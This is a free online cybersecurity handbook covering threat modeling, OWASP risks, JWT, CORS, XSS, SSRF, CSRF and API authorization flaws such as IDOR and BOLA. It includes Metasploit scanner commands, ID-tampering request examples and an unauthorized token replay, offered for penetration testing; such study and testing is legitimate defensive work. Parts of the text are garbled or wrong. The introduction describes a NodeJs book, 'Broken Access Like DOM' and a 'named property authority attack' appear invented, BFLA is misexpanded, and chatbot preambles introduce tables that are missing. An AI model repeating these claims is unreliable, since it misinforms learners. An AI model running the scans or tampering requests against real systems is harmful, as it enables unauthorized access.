Cyber-Security MDBook

This book is completely Free and Open Source.

I have developed a range of practical scenarios for each topic. Should you need access to these resources, please do not hesitate to contact me. Furthermore, I have delivered over 100 tailored Cybersecurity Assessment Reports for a wide variety of organizations, effectively addressing their distinct risk profiles and specific requirements.

If you found this cysec-all-in-one book valuable and wish to contribute, consider supporting my efforts via cryptocurrency. Thanks!

0xde5D732a5AB44832E1c69b18be30834639F44A2c

Downloads

You can also download the Epub version here:

https://github.com/armanriazi/cysec-all-in-one/tree/main/downloads

Introduction

Welcome to The Concise cysec-all-in-one Book! This guide equips you with essential knowledge and practical skills for effective NodeJs development. Discover key concepts and techniques to write clean, robust code. Whether you’re a beginner or an experienced developer, this book serves as both a comprehensive guide and a handy reference for leveraging ES6 power in your projects.

About the Author

Arman Riazi is an experienced Senior Backend-end Developer with a passion for Rust, R&D and Blockchain since 2012. You can reach Arman Riazi on the following platforms:

• LinkedIn: https://www.linkedin.com/showcase/armanriazi-github-io
• GitHub: https://github.com/armanriazi
• Twitter: https://twitter.com/armanriazi.meta
• Email: armanriyazi.github.io📧gmail.com

CyberSecurity

I have developed a range of practical scenarios for each topic. Should you need access to these resources, please do not hesitate to contact me. Furthermore, I have delivered over 100 tailored Cybersecurity Assessment Reports for a wide variety of organizations, effectively addressing their distinct risk profiles and specific requirements.

The Complete Architecture’s Guide

Introductory

Layers of security in cybersecurity

Implementing these layered security controls provides a comprehensive defense against various threats, enhancing resilience and reducing the likelihood of successful attacks.

Information Assurance (IA)

IA is for protecting information system.

Integrity

• Having AntiVirus
• Having Policies
• Data will not be tampered(altered or destroyed)

Availability

• Who are allowed/blocked to access

Authetication

• Identify facets

Confidentiality

• Access by those authorized

Non-repudiation

• someone can not deny his/her action

Network Defence Approch [1]

Preventive

• Firewalls
• Prevention Systems(IDS, IPS systems like snort)
• Intrusion Detection
• AntiVirus

Reactive

• Responds to past and present threads
• Cover net monitoring for anomalies, forensics, and incident response
• Ad-blockers
• Spam filters
• Password manager
• AntiVirus programming

Retrospective

• Causes for atk(after atks)
• Use protocols to:
• Analyze
• Monitored net traffic
• Prevent it from ever happening

Proactive

• Anticipation of an atk against:
• With aims of countering future atks.

Data security and threat detection

Terminology in Data Security

Use Cases for Each Term

• True Positive (TP):

  • Security software successfully identifies and quarantines a phishing email that contains a malicious link.

• True Negative (TN):

  • An employee’s genuine access to a secure document is correctly classified as permitted, preventing unnecessary alerts to security teams.

• False Positive (FP):

  • An application that performs normal data transmission is flagged and quarantined as potential data exfiltration, leading to communication disruptions.

• False Negative (FN):

  • A new strain of malware infiltrates the network, but the detection system fails to recognize it due to outdated signatures, allowing the malware to execute.

• Precision:

  • In a company where every alert has a significant operational cost, high precision is crucial to minimize unnecessary investigations.

• Recall (Sensitivity):

  • In a healthcare environment, high recall is vital to catch all potential breaches that might expose patient information, regardless of the resulting false alarms.

• F1 Score:

  • In a fraud detection system where both missing fraudulent transactions and wrongly flagging legitimate transactions can lead to financial losses.

• ROC Curve:

  • A security analyst uses the ROC curve to determine the optimal threshold for a new intrusion detection system that balances the rates of true and false positives.

These metrics guide organizations in their threat detection efforts, helping them fine-tune their security measures while minimizing operational disruptions and maximizing security efficacy. Regular analysis of these metrics can inform necessary adjustments and enhancements to detection algorithms and configurations.

Indicates the Techniques

Common vulnerability

Revised Horizontal Flow for Threat Modeling Techniques

1. STRIDE

User => System => STRIDE Threats => (Spoofing=> Tampering=> Repudiation=> Information Disclosure=> 
                                     Denial of Service=> Elevation of Privilege)

2. PASTA

Business Goals => Technical Scope => Application Design => Threat Analysis => Security Controls => Security Testing

3. OCTAVE

Organizational Goals => Identify Assets/Vulnerabilities/Threats => Risk Analysis => Develop Risk Mitigation Strategies

4. TRIKE

Stakeholders => Identify Assets/Values => Identify Threats/Vulnerabilities => Threat Analysis => Risk Management/Mitigation

Tables for Integrity & Relationships

Table: Threat Modeling Techniques Comparison

High-Level Relationship Model

This model outlines the relationships between the main components of threat modeling:

Assets => Vulnerabilities => Threats => Security Controls

Low-Level Relationship Model

This model provides more details about the components and their interconnections:

+------------------+                  +------------------+
|     Assets       |                  |     Threats      |
| (Data, Systems)  | <--------------> | (Types of Attacks)|
+------------------+                  +------------------+
          |                                     ^
          |                                     |
          |                                     |
          v                                     |
   +------------------+                  +------------------+
   |  Vulnerabilities  | <--------------> |   Threat Actions  |
   | (Weaknesses)     |                  | (Exploits)       |
   +------------------+                  +------------------+
          |                                     |
          |                                     |
          v                                     |
   +------------------+                  +------------------+
   | Security Controls | <--------------> |  Security Measures|
   | (Mitigations)    |                  | (Defense Mechanisms)|
   +------------------+                  +------------------+

Explanation of Models

1. High-Level Relationship Model:

   • Assets represent the critical items that need protection (e.g., sensitive data).
   • Vulnerabilities are weaknesses in the system that could be exploited by threats.
   • Threats are potential events that could lead to harm or damage to the assets.
   • Security Controls are the measures put in place to mitigate the identified vulnerabilities that threats might exploit.

2. Low-Level Relationship Model:

   • Provides a more detailed view of the interactions between components.
   • Involves stakeholders in identifying and evaluating assets and threats.
   • Links vulnerabilities with their potential threat actions (exploits) and connects security controls with specific security measures (like access control mechanisms) that can be employed to safeguard the assets effectively.

This structured approach ensures a clear, comprehensive understanding of the relationships, risks, and mitigation strategies within a threat modeling framework.

• Search WAF

OWASP

The Open Web Application Security Project (OWASP) maintains a list of the top security risks for web applications, known as the OWASP Top Ten. This list is widely recognized in the industry and serves as a guide for organizations to enhance their web application security practices.

OWASP Top Ten security risks

The OWASP Top Ten serves as an essential resource for understanding the most critical security risks to web applications, helping organizations prioritize their security efforts and implement effective mitigation strategies.

HTTP Security Headers

[T1]

• Check Online Security Headers

Certainly! Below is a structured table representing the HTTP security headers, including ASCII art examples of how you might format these in a tool like Postman.

HTTP Security Headers Examples in Postman

Certainly! Below are the tables for HTTP security headers configuration for Apache and Nginx, now including a description for each header.

HTTP Security Headers Configuration for Apache

HTTP Security Headers Configuration for Nginx

Cookie Flags

Common Endpoints[S1]

JWT

Cheet Sheet

Here’s an expanded JWT (JSON Web Token) cheat sheet table that includes examples for each aspect. This will help clarify how to implement and utilize JWTs in web applications.

Additional Considerations

• Token Size: Limit payload size to improve performance, especially for mobile applications.
• Libraries: Use established libraries for JWT handling (e.g., jsonwebtoken in Node.js, jwt in Python).
• Audit Logs: Maintain logs of token usage for security and monitoring.

Token Structure

Sure! Below is an ASCII representation of the structure of a JSON Web Token (JWT) along with related components such as headers and claims. A JWT typically consists of three parts: Header, Payload, and Signature. In this representation, I’ll include the components of the JWT and some key flags that may be relevant.

+-------------------------------------------------------+
|                       JSON Web Token                  |
+-------------------------------------------------------+
|                       Header                           |
| -----------------------------------------------------  |
| {"alg": "HS256", "typ": "JWT"}                        |
| - alg: Algorithm used for signing (e.g., HS256)      |
| - typ: Type of the token (JWT)                         |
+-------------------------------------------------------+
|                       Payload                          |
| -----------------------------------------------------  |
| {"sub": "1234567890",                                 |
|  "name": "John Doe",                                   |
|  "iat": 1516239022,                                   |
|  "exp": 1516242622}                                   |
| - sub: Subject (e.g., user ID)                        |
| - name: User's name                                    |
| - iat: Issued at (timestamp for when token was issued)|
| - exp: Expiration time (timestamp)                    |
| - other custom claims can be added here as needed     |
+-------------------------------------------------------+
|                       Signature                        |
| -----------------------------------------------------  |
| HMACSHA256(                                          |
|   base64UrlEncode(header) + "." +                    |
|   base64UrlEncode(payload),                           |
|   your-256-bit-secret)                                |
| - Used to verify that the sender of the JWT is who it  |
|   claims to be and to ensure that the message wasn't   |
|   changed along the way.                               |
+-------------------------------------------------------+

Example JWT

Here’s an example JWT string that encapsulates the above components:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.\
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.\
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Explanation of the Example JWT

1. Header:

   • alg: Indicates the algorithm used (HMAC SHA-256).
   • typ: Indicates the type of the token (JWT).

2. Payload:

   • sub: Identifier for the subject of the token (user ID).
   • name: A claim that represents the user’s name.
   • iat: Indicates when the token was issued (in UNIX timestamp format).

3. Signature:

   • Combines the base64Url encoded header and payload along with a secret key to produce a signature.

Related Flags/Headers (for JWT usage)

• Authorization: Bearer tokens are typically sent in the Authorization header when making requests to protect resources.
• exp: Expiration time of the token, limiting how long the token is valid.
• nbf: Indicates that the token is not valid before a certain time.
• iat: Issued at-time for the token.
• jti: Unique identifier for the token.

Using JWTs allows for secure transmission of information between parties and can be verified and trusted since they are digitally signed.

Certainly! Below is the organized table with headers clearly delineating the Problem and Solution columns, along with a brief introduction for clarity.

JWT Security Issues and Solutions

Here’s a sorted comparison table of RSA (Rivest-Shamir-Adleman) and HMAC (Hash-based Message Authentication Code), along with other related cryptographic methods. The table highlights their characteristics, use cases, strengths, weaknesses, and a comparative analysis regarding their vulnerability to attacks.

In terms of which is better for attacking, both are designed to prevent unauthorized access and attacks. However, poorly implemented systems using RSA without proper key management practices could be more susceptible to attacks compared to a well-implemented HMAC system under proper conditions.

Access-Control-Allow-Origin (CORS) in Cybersecurity and OWASP

Access-Control-Allow-Origin is a response header used in the Cross-Origin Resource Sharing (CORS) protocol which is designed to restrict how web pages from different origins can interact with each other. Understanding this header is critical in the context of web security, particularly concerning Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) vulnerabilities.

CORS Context

1. Same-Origin Policy:

   • Web browsers enforce a security model called the same-origin policy, which restricts how documents or scripts loaded from one origin can interact with resources from another origin. An “origin” is defined as the combination of the protocol (HTTP/HTTPS), domain, and port.
   • CORS provides a standardized way for a web server to allow resources to be requested from a different origin, thereby relaxing the same-origin policy under controlled conditions.

2. Access-Control-Allow-Origin:

   • This specific header indicates whether the resources from a specific origin should be allowed to access the resource.
   • Syntax:
     • Access-Control-Allow-Origin: * – Allows all origins to access the resource (not secure for sensitive data).
     • Access-Control-Allow-Origin: https://example.com – Only allows the specified origin to access the resource.
   • The header is used in response to HTTP requests, defining which domain(s) are permitted to access the resource, thus enabling secure cross-origin requests.

Security Implications

1. Open CORS Misconfigurations:

   • Setting Access-Control-Allow-Origin to * without restrictions can expose your application to potential security risks, allowing any external website to make requests to your API. This can lead to data leaks and unintended actions being performed on behalf of the user.

2. Preflight Requests:

   • For complex CORS requests (like HTTP methods other than GET or POST, or custom headers), browsers perform a preflight request using the OPTIONS method. Proper handling of these requests is essential to ensure that the server correctly allows or denies these requests.

3. XSS Vulnerabilities:

   • If an application is vulnerable to XSS, an attacker can execute scripts in the context of a user’s session. Weak CORS settings can allow attackers to make unauthorized requests from malicious websites, potentially leading to data theft or session hijacking.

4. CSRF Risks:

   • CSRF attacks can exploit CORS if the Access-Control-Allow-Origin header is not tightly restricted. Attackers can trick users’ browsers into making unwanted requests to authenticated endpoints.

OWASP Guidelines

The Open Web Application Security Project (OWASP) provides guidelines for securing web applications, including the following recommendations related to CORS:

1. Set CORS Policies Strictly: Only allow specific origins that need access to your resources. Avoid using wildcards (*) unless absolutely necessary.
2. Implement CSRF Protections: Use tokens to protect against CSRF. Ensure that your APIs include CSRF defenses in conjunction with CORS settings.
3. Validate Input: Always validate and sanitize input on the server side, especially when handling requests that come from different origins.
4. Monitor and Log: Logging CORS requests can help in monitoring for anomalies and potential security issues.

Conclusion

The Access-Control-Allow-Origin header plays a crucial role in web security by controlling cross-origin resource sharing. Proper implementation and configuration are vital to mitigate risks associated with web vulnerabilities such as XSS and CSRF. Following OWASP guidelines can enhance an application’s security posture regarding CORS and other security measures.

Introduction of API

DOM

The Broken Access Like DOM (Domain) in security systems refers to a vulnerability that allows attackers to bypass authentication mechanisms or gain unauthorized access to sensitive resources within an organization’s network. This type of vulnerability often occurs when there are weaknesses in how user accounts, permissions, or access controls are managed across different domains or systems.

How it works

1. Multiple domains or systems exist within an organization’s network.
2. Each domain has its own set of users and access controls.
3. There are inconsistencies or gaps in how these access controls are implemented or enforced across domains.
4. An attacker exploits these inconsistencies to gain access to a domain they shouldn’t have access to.

Examples of vulnerabilities

• Weak password policies across domains
• Inadequate multi-factor authentication implementation
• Incorrectly configured firewall rules[S1]
• Unpatched[S1] vulnerabilities in applications used across domains
• Misconfigured[S1] identity federation services

Impact on security

The Broken Access Like DOM vulnerability can lead to significant security risks:

• Unauthorized access to sensitive data
• Potential lateral movement within the network
• Increased risk of data breaches
• Difficulty in tracking and managing user activities across domains
• Compliance issues due to inadequate access control measures

Mitigation strategies

To address this vulnerability, organizations should implement:

• Centralized identity management solutions
• Consistent access control policies across all domains
• Regular audits and penetration testing
• Implementation of least privilege principle
• Continuous monitoring of user activities and access patterns

Best practices

• Implement a zero-trust model for network access

• Use role-based access control consistently across all domains

• Conduct regular security assessments and compliance checks

• Educate employees about the importance of secure practices across all systems

• Keep all software and systems up-to-date with the latest security patches

By understanding and addressing the Broken Access Like DOM vulnerability, organizations can significantly strengthen their overall security posture and protect against various types of cyber threats.

XSS

The named XSS (Cross-Site Scripting) attack in security systems is known as “Stored Cross-Site Scripting” or “Persistent Cross-Site Scripting.” This type of attack involves storing malicious scripts on a website that will be executed by other users when they visit the page.

Characteristics of Stored XSS

• The attacker injects malicious JavaScript code into a database or file system that is accessed by the web application.
• The injected script remains stored on the server until it is retrieved and executed by a user’s browser.
• It can affect all users who access the compromised content, regardless of whether they have an account or not.

Examples of Stored XSS Attacks

• Comment sections where users can post comments[S2] without moderation

• File upload[S1] systems where files are stored on the server and displayed to others

• Search functionality that displays results from a database[S1]

Prevention Strategies

• Implement proper input validation and sanitization at every point where user data is processed

• Use Content Security Policy (CSP)[S1] to restrict which sources of content are allowed to be executed

• Regularly update and patch web applications to fix vulnerabilities

• Educate users about the risks of clicking on suspicious links or downloading attachments from unknown sources

Impact of Stored XSS

• Can lead to unauthorized access to sensitive data
• Allows attackers to steal user sessions or cookies[S1]
• Enables malicious redirections to phishing sites or malware downloads
• Can compromise the integrity of the entire web application

Stored XSS attacks are particularly dangerous because they can affect users who didn’t interact with the attacker directly, making them a significant threat to overall system security.

SSRF

What is SSRF?

SSRF stands for Server-Side Request Forgery[S3]. It is a type of web application vulnerability where an attacker can induce the web application to send a request to any arbitrary internal or external server, potentially exposing internal network services or data.

How SSRF works

1. An attacker sends a specially crafted HTTP request[S1] to the vulnerable web application.
2. The web application processes the request and makes another request to a server specified by the attacker.
3. The attacker can manipulate the request to target internal servers, databases, or other sensitive resources.

Types of SSRF attacks

1. Internal SSRF: Targets internal servers within the organization’s network.
2. External SSRF: Targets external servers outside the organization’s network.
3. Blind SSRF: Occurs when the application doesn’t return the response content to the attacker.

Examples of SSRF attacks

1. Attacker targets internal DNS servers[S1] to obtain sensitive information.
2. Attacker exploits internal web servers to steal data or inject malware.
3. Attacker manipulates the application to connect to unintended external services.

Prevention strategies

1. Validate and sanitize all user inputs.
2. Implement strict access controls on internal services.
3. Use Content Security Policy (CSP) to restrict where resources can be loaded from.
4. Implement rate limiting and IP blocking.
5. Regularly update and patch web applications.

Key considerations

• SSRF can lead to significant security risks if left unchecked.
• It often requires careful analysis of application behavior to detect.
• Proper input validation and output encoding are crucial defenses against SSRF.

Property Authority

The named property authority attack is a type of vulnerability that can occur in various security systems, particularly those relying on access control mechanisms. This attack exploits weaknesses in how permissions or authorities are assigned and managed within a system.

How it works

In a typical scenario:

1. An attacker gains unauthorized access to a system or network.
2. They discover a way to manipulate or alter the named properties (permissions) associated with user accounts or resources.
3. By modifying these properties, the attacker can elevate their privileges or gain access to restricted areas without being detected.

Examples of affected systems

This type of attack can affect various types of security systems, including:

• Access Control Systems (ACS)
• Identity and Access Management (IAM) solutions
• Network Security Groups (NSGs)
• Cloud-based security platforms

Mitigation strategies

To prevent or mitigate named property authority attacks:

• Implement strict access controls and least privilege principles
• Regularly audit and review user permissions
• Use role-based access control (RBAC) instead of static permissions
• Implement multi-factor authentication (MFA) for all users
• Conduct regular penetration testing and vulnerability assessments

Real-world implications

Named property authority attacks have significant real-world implications:

• Data breaches: Attackers may gain unauthorized access to sensitive data.
• System compromise: Malicious actors could potentially take control of critical systems.
• Compliance issues: Organizations may face regulatory penalties for failing to protect user data and system integrity.

APIs

Named API Vulnerabilities

1. Insecure Direct Object Reference (IDOR):

   • Occurs when an application provides direct access to objects based on user-supplied input [3].
   • Attackers can bypass authorization and access resources in the system directly, such as database records or files [3].

2. Broken Object Level Authorization (BOLA):

   • Similar to IDOR, BOLA is defined as “IDOR in APIs” [3].
   • APIs often expose endpoints handling object identifiers, creating a wide attack surface[S1] [3].

3. Missing Function Level Access Control (MFLAC):

   • Refers to broken access control on functions rather than objects [3].
   • Web applications should verify function-level access rights for all requested actions by any user [3].

4. Broken Access Control (BAC):

   • Represents a security flaw within applications that allows individuals to gain access to data and functions they are not authorized for [1].
   • Can occur due to weak or improperly implemented access control measures [1].

Key Considerations

• These vulnerabilities often result from misconfigurations, insufficient testing, or inadequate enforcement of access control mechanisms [1].
• They can lead to unauthorized data exposure, full system compromise, and other security issues [2].
• Common weaknesses associated with broken access control include insecure direct object references, insufficient authentication, and misconfigured access control mechanisms [1].

Prevention Strategies

1. Implement secure authentication and authorization mechanisms from the outset [1].
2. Validate user inputs and declare authorized access at the code level [1].
3. Include access control unit and integration tests in testing routines [1].
4. Enforce role-based access control (RBAC) and attribute-based access control (ABAC) mechanisms [1].
5. Ensure effective access control is enforced on the trusted server-side or server-less API [1].

CSRF

What is CSRF?

CSRF stands for Cross-Site Request Forgery. It is a type of web application security vulnerability that allows an attacker to trick a web application into performing unintended actions. Specifically, it occurs when an attacker tricks a user into submitting a form or clicking a link that performs an unintended action on behalf of the user.

How CSRF works

1. An attacker creates a malicious website or email that contains a hidden form or button[S1].
2. The form or button submits a request to the victim’s trusted site.
3. The request is executed without the user’s knowledge or consent.

Key points about CSRF

• It relies on the user already being authenticated on the targeted site.
• It doesn’t involve stealing credentials, but rather manipulating the user’s existing session.
• It’s often combined with other attacks to increase its impact.

Examples of CSRF attacks

1. Changing account settings
2. Transferring funds
3. Deleting content
4. Modifying personal information

Prevention techniques

1. Implementing the Same-Origin Policy
2. Using tokens or cookies that are unique per session
3. Validating referrer headers
4. Using double-submit cookies
5. Implementing Content Security Policy (CSP)

Best practices

• Always validate incoming requests, especially those involving sensitive operations.
• Use tokens or cookies that are unique per session.
• Educate users about the risks of clicking suspicious links or opening attachments from unknown sources.
• Regularly update and patch your web application to fix known vulnerabilities.

Understanding API Vulnerabilities: BOLA, IDOR, BAC, and MFLAC

In the realm of web application security, several vulnerabilities can arise from improper authorization checks. Understanding these vulnerabilities is crucial to safeguard sensitive data from unauthorized access. Among these, Broken Object Level Authorization (BOLA), Insecure Direct Object References (IDOR), Broken Access Control (BAC), and Missing Function Level Access Control (MFLAC) are critical issues that can lead to severe consequences if not addressed. This comprehensive guide will delve deeper into each of these vulnerabilities, accompanied by real-world scenarios, detailed explanations, and practical testing methods using tools like Metasploit and Burp Suite.

Sure! Here is the updated table with the addition of BFLA (Business Logic Abuse):

Mitigation Strategies for Vulnerabilities

BOLA Mitigation Strategies

BOLA:
1. Implement strict authorization checks to ensure users can only access their resources.
2. Use unique identifiers for user-specific endpoints that require authorization checks.
3. Leverage role-based access control (RBAC) or attribute-based access control (ABAC).

IDOR:
1. Replace predictable identifiers with non-sequential, random identifiers.
2. Enforce strict access controls based on user roles.
3. Conduct input validation to ensure that users cannot manipulate identifiers.

BAC:
1. Implement role-based access controls to restrict sensitive operations.
2. Validate user roles on every sensitive operation.
3. Utilize secure coding practices to prevent bypassing checks (e.g., validating with sessions and tokens).

MFLAC:
1. Enforce function-level access controls by validating user permissions before executing sensitive actions.
2. Utilize middleware for consistent access checks across all routes.
3. Regularly audit roles and permissions to ensure they align with business processes.

BFLA is a security vulnerability that occurs when an application fails to properly enforce access controls for different functions or features based on user roles. This flaw allows unauthorized users to access functionalities they should not be allowed to use, leading to potential security breaches.

To prevent BFLA, enforce authorization checks on the server side to ensure that each user has the appropriate permissions before executing sensitive functions. Regular security testing should also be conducted to identify and fix any access control issues.

All types of vulnerabilities of APIs

Broken Function Level Authorization (BFLA)

Consider a web application with user roles such as “Admin” and “User.” The application has a function to delete user accounts, which should only be accessible to Admins.

• Normal Behavior:

  • Admin User: Can access the delete functionality at DELETE /users/{id}.
  • Regular User: Should be restricted from accessing this function.

• Exploit: An attacker who has logged in as a regular user discovers the delete endpoint and sends a request like:

  DELETE /users/123
  

  Since the application lacks proper authorization checks, the regular user is able to delete the account of user ID 123, which they should not have permission to do.

Insecure Direct Object References (IDOR)

IDOR is a common security vulnerability that occurs when an application exposes direct access to objects such as files or database records without proper authorization checks. Attackers can exploit this vulnerability by manipulating the references to access unauthorized data. Basics of what IDOR is, how it works, its risks, and methods for detection and prevention.

Sample Response

What is IDOR?

Insecure Direct Object Reference (IDOR) is a type of security vulnerability found in web applications that occurs when an application exposes a reference to an internal object, such as a database record or a file, without proper authorization checks. This allows an attacker to manipulate the reference to access or perform actions on objects they are not authorized to interact with.

How IDOR Works:

IDOR typically involves a situation where an application uses user-supplied input to directly reference internal objects. For example, consider a URL that allows users to access their profile:

http://example.com/user/profile?id=123

In this example, id=123 might refer to a unique user record in the database. If the application does not verify whether the authenticated user has permission to access that specific user profile, an attacker could change the ID in the URL to access another user’s profile:

http://example.com/user/profile?id=124

If the application lacks proper authorization controls, the attacker could view, modify, or delete data belonging to another user. This can lead to unauthorized data access, data exfiltration, or other harmful consequences.

Risks Associated with IDOR:

• Data Exposure: Sensitive data from other users can be accessed without authorization.
• Data Manipulation: Attackers may modify or delete records they shouldn’t be able to.
• Reputation Damage: Organizations may suffer reputational harm if users’ data is compromised.
• Regulatory Compliance Issues: Applications that fail to protect user data may face legal and regulatory repercussions.

Detection and Prevention:

To detect IDOR vulnerabilities, one can perform manual testing by manipulating parameters in HTTP requests and observing the application’s response. Automated tools like Burp Suite or OWASP ZAP can also help in scanning for such vulnerabilities.

Preventive Measures:

• Access Control Checks: Always validate that the user has permission to access the requested objects, regardless of the input provided.
• Indirection: Use indirect references or tokens instead of exposing direct object references. For instance, instead of using user_id, you could use a token that maps to the user in the backend.
• Logging and Monitoring: Implement logging for access requests to detect any unauthorized access attempts.

How to Detect IDOR Vulnerabilities

Here are some steps and methods to detect IDOR vulnerabilities systematically:

1. Understanding IDOR

• Get familiar with how the application exposes resources. This often happens in URLs or API parameters where object IDs are passed, such as:
  • /user/profile?id=123
  • /invoice/details?invoice_id=456
• The vulnerability arises when an attacker can change the ID (e.g., from 123 to 124) to access data belonging to another user.

2. Manual Testing

• Identify Parameters: Make note of any parameters in the application that reference internal objects.
• Manipulate Requests:
  • Use a browser’s developer tools to inspect and intercept requests.
  • Modify object IDs to attempt to access other users’ data.
• Check for Response: If you receive a response containing information that does not belong to your user, it’s likely an IDOR vulnerability.

3. Automated Scanning Tools

• Use security testing tools that can detect IDOR vulnerabilities. Some popular tools include:
  • Burp Suite: Can be configured to automatically scan for IDOR by testing parameter values.
  • OWASP ZAP (Zed Attack Proxy): Can also be used for testing web applications and includes features for detecting IDOR.
  • Acunetix, Nessus: Other scanners that can include IDOR checking as part of their scanning capabilities.

4. Burp Suite Example

• Intercept HTTP Requests: Configure Burp to intercept requests sent from your browser.
• Send to Repeater: Send requests to the Repeater tool where you can modify parameters easily.
• Modify Parameter: Change the parameter value (e.g., the user ID or invoice ID) to see if you can access unauthorized data.
• Analyze Responses: Check the responses to see if sensitive information from other users is returned.

5. Code Review (For Developers)

• Perform security code reviews, focusing on how the application handles user input for object references.
• Ensure proper access controls are implemented for object access, verifying users’ permissions before serving data.

Example of Testing for IDOR

IDOR vulnerabilities can pose severe risks, especially in applications handling sensitive information. Regular testing and securing object references with proper authorization checks and roles can significantly reduce the risk of IDOR vulnerabilities. Security training for developers on secure coding practices is also essential to prevent such vulnerabilities from being introduced during development. Suppose you have a URL like this:

http://example.com/user/profile?id=10

1. Initial Request: You send the above request and receive the profile details for user ID 10.
2. Manipulate the ID: Change the id parameter to 11, 12, etc.:
   • http://example.com/user/profile?id=11
   • http://example.com/user/profile?id=12
3. Analyze Responses: If you receive the details of other user profiles (id=11 or id=12), you have found an IDOR vulnerability.

Yes, Metasploit can be used for testing web applications, particularly in the context of penetration testing and identifying vulnerabilities. While Metasploit is primarily known for its exploit database and capabilities against operating systems and network services, it also has various auxiliary and exploit modules specifically designed for web applications.

IDOR with Metexploit

Metexploit

Metasploit doesn’t have a built-in module for testing IDOR vulnerabilities specifically. However, you can use Metasploit in combination with other tools or techniques to identify and exploit IDOR vulnerabilities. Here’s a general approach:

Using Metasploit for Web Application Testing

Here are some ways you can use Metasploit for web application testing:

1. Web Scanning Modules

Metasploit includes multiple auxiliary modules that can perform various types of scans against web applications. Examples include:

• SQL Injection Detection:

  use auxiliary/scanner/http/sql_injection
  set RHOSTS <target>
  set TARGETURI /login.php?username=admin&password=admin
  run
  

• Directory and File Enumeration:

  use auxiliary/scanner/http/dir_scanner
  set RHOSTS <target>
  set RPATH /path/to/directory
  run
  

• XSS Testing: Metasploit has modules that can help identify potential Cross-Site Scripting (XSS) vulnerabilities.

2. Exploit Modules for Web Frameworks

Some modules are designed specifically to exploit vulnerabilities in web applications and frameworks, such as:

• WordPress Exploits: Exploits for known vulnerabilities in WordPress plugins or themes.
• CMS Exploits: Modules for exploiting vulnerabilities in various Content Management Systems (CMS).

3. Metasploit’s Web Application Testing Utilities

In addition to exploiting vulnerabilities, Metasploit provides several utilities for web application testing, including:

• Metasploit Pro: If you’re using the Pro version of Metasploit, it includes additional web application security testing features and capabilities to integrate with tools like Burp Suite.

• Web Application Attack Framework: Metasploit includes a set of tools (Metasploit Community edition) for web application attack simulations.

4. Integration with Other Tools

You can also combine Metasploit with other tools for a more robust web application testing experience:

• Burp Suite: You can use Burp to intercept requests and then send them to Metasploit for exploitation.
• OWASP ZAP: Similar to Burp, ZAP can be used for initial scanning and interception of requests that can then be exploited using Metasploit.

Example of Testing a Web Application

1. Initialize Metasploit:

   msfconsole
   

2. Search for Web Modules:

   search type:auxiliary http
   

3. Select a Module:

   use auxiliary/scanner/http/sql_injection
   

4. Set Target and Run:

   set RHOSTS <target>
   set TARGETURI /example.php?id=1
   run
   

5. Check Results: Analyze the output to determine if the web application is vulnerable and plan further actions accordingly.

Broken Access Control (BAC)

Broken Access Control (BAC) refers to a security vulnerability where an application fails to properly enforce restrictions on what authenticated users can do. This allows attackers to access unauthorized functionality or data.

Understanding BAC

BAC occurs when access control checks are missing or improperly implemented. Common examples include:

• Bypassing access control checks by modifying the URL or HTML page
• Allowing privilege escalation by changing user role parameters
• Accessing API endpoints without proper authorization
• Metadata manipulation like tampering with JWT tokens

Key Risks

• Unauthorized Access: Users can access restricted functionality or data
• Privilege Escalation: Users can elevate their privileges to admin/higher roles
• Information Disclosure: Sensitive data exposed to unauthorized users
• Data Manipulation: Unauthorized modification of data

Detection Methods

1. Manual Testing:

   • Attempt to access restricted URLs/endpoints
   • Modify user roles and permissions in requests
   • Test vertical and horizontal privilege escalation

2. Automated Scanning:

   • Use web vulnerability scanners
   • Implement automated security testing
   • Deploy continuous security monitoring

Prevention Strategies

• Implement Strong Access Controls:

  • Use role-based access control (RBAC)
  • Enforce principle of least privilege
  • Validate permissions on server-side

• Security Best Practices:

  • Deny access by default
  • Log access control failures
  • Use secure session management
  • Implement rate limiting

Example Testing Scenario

# Original admin request
GET /admin/users HTTP/1.1
Authorization: Bearer <admin_token>

# Attempting unauthorized access
GET /admin/users HTTP/1.1
Authorization: Bearer <regular_user_token>

Regular security testing and proper implementation of access controls are essential to prevent BAC vulnerabilities and protect sensitive resources. By implementing robust authorization checks and regularly testing for vulnerabilities, applications can mitigate the risks associated with BOLA and protect sensitive user data.

Broken Object Level Authorization (BOLA)

BOLA is a critical security vulnerability that arises when an application does not properly enforce authorization checks for object-level access. This flaw allows attackers to manipulate requests to access or modify objects they are not authorized to interact with.

Understanding BOLA

BOLA occurs when an application fails to verify whether the user has the necessary permissions to perform actions on a specific object. For example, consider an API endpoint that retrieves user details:

GET /api/user/details?user_id=123

If the application does not enforce proper authorization checks, an attacker could change the user_id parameter to access another user’s details:

GET /api/user/details?user_id=124

Risks Associated with BOLA

• Unauthorized Access: Attackers can access sensitive information of other users.
• Data Manipulation: Unauthorized modification or deletion of data.
• Compliance Violations: Breaches of data protection regulations.
• Reputation Damage: Loss of trust from users due to data breaches.

Detecting and Preventing BOLA

Detection

1. Manual Testing:

   • Identify endpoints that expose object references.
   • Manipulate object identifiers in requests to test access control.
   • Verify if unauthorized data is accessible.

2. Automated Tools:

   • Use tools like Burp Suite or OWASP ZAP to scan for BOLA vulnerabilities.
   • Configure tools to test object-level authorization by altering request parameters.

Prevention

• Implement Access Controls: Ensure that every request is checked against the user’s permissions for the specific object.
• Use Indirect References: Employ indirect references or tokens instead of direct object identifiers.
• Regular Audits: Conduct regular security audits and code reviews to identify and fix authorization issues.
• Security Training: Educate developers on secure coding practices to prevent BOLA vulnerabilities.

Example of Testing for BOLA

Consider an API endpoint:

GET /api/order/details?order_id=1001

1. Initial Request: Access the endpoint with a valid order_id to retrieve order details.
2. Manipulate the ID: Change the order_id to test unauthorized access:
   • GET /api/order/details?order_id=1002
3. Analyze Responses: If details of another order are returned, a BOLA vulnerability is present.

By implementing robust authorization checks and regularly testing for vulnerabilities, applications can mitigate the risks associated with BOLA and protect sensitive user data.

Missing Function Level Access Control (MFLAC)

Missing Function Level Access Control (MFLAC) is a security vulnerability that occurs when an application does not properly enforce access controls at the function level. This allows unauthorized users to invoke functions or execute operations that they should not have access to.

Understanding MFLAC

MFLAC arises when the application fails to verify whether the user has the necessary permissions to execute a specific function. For example, consider an API endpoint that allows users to delete accounts:

DELETE /api/user/delete

